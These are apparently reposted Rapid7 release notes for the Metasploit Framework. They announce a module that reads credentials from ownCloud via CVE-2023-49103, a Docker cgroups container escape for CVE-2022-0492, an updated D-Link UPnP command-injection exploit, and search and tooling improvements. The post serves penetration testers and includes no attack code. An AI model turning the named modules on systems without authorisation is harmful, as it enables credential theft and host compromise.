If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit Wrap-Up 12/8/2023

Post Syndicated from Brendan Watters original https://blog.rapid7.com/2023/12/08/metasploit-wrap-up-12-8-2023/

Are You Looking for ACTION?

Metasploit Wrap-Up 12/8/2023

Our very own adfoster-r7 has added a new feature that adds module actions, targets, and aliases to the search feature in Metasploit Framework. As we continue to add modules with diverse goals or targets, we’ve found ourselves leaning on these flags more and more recently, and this change will help users better locate the modules that let them do what they want.

Metasploit Wrap-Up 12/8/2023

Right now, the feature is behind a feature flag as we work out how to make it as user-friendly as possible. If you would like to use it, turn on the feature by running features set hierarchical_search_table true. Please let us know how it works for you!

New module content (2)

ownCloud Phpinfo Reader

Authors: Christian Fischer, Ron Bowes, creacitysec, h00die, and random-robbie
Type: Auxiliary
Pull request: #18591 contributed by h00die
Path: gather/owncloud_phpinfo_reader

Description: This adds an auxiliary module for CVE-2023-49103 which can extract sensitive environment variables from ownCloud targets including ownCloud, DB, Redis, SMTP, and S3 credentials.

Docker cgroups Container Escape

Authors: Kevin Wang, T1erno, Yiqi Sun, and h00die
Type: Exploit
Pull request: #18578 contributed by h00die
Path: linux/local/docker_cgroup_escape

Description: This adds a new module to exploit CVE-2022-0492, a docker escape for root on the host OS.

Enhancements and features (5)

  • #17667 from h00die – Makes various performance and output readability improvements to Metasploit’s password cracking functionality. Now, hash types without a corresponding hash are skipped, invalid hashes are no longer output, cracking stops for a hash type when there’s no hashes left, and empty tables are no longer printed. Other code optimizations include added support for Hashcat username functionality, a new quiet option, and documentation updates to the wiki.
  • #18446 from zeroSteiner – This makes the DomainControllerRhost option optional, even when the authentication mode is set to Kerberos. It does so by looking up the Kerberos server using the SRV records that Active Directory publishes by default for the specified realm.
  • #18463 from h00die-gr3y – This updates the linux/upnp/dlink_upnp_msearch_exec exploit module to be more generic and adds an advanced detection logic (check method). The module leverages a command injection vulnerability that exists in multiple D-Link network products, allowing an attacker to inject arbitrary command to the UPnP via a crafted M-SEARCH packet. This also deprecates the modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi module, which uses the same attack vector and can be replaced by this updated module.
  • #18570 from adfoster-r7 – Updates Metasploit’s Docker ruby version from 3.0.x to 3.1.x.
  • #18581 from adfoster-r7 – Adds hierarchical search table support to Metasploit’s search command functionality. The search table now includes a module’s actions, targets, and alias metadata. This functionality requires the user to opt-in with the command features set hierarchical_search_table true.

Bugs fixed (1)

  • #18603 from h00die – Updates the auxiliary/scanner/snmp/snmp_enum and auxiliary/scanner/snmp/snmp_login module metadata to include metadata references to CVE-1999-0516 (guessable SNMP community string) and CVE-1999-0517 (default/null/missing SNMP community string).

Documentation added (1)

  • #18592 from loredous – Fixes a typo in the SMB pentesting documentation.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro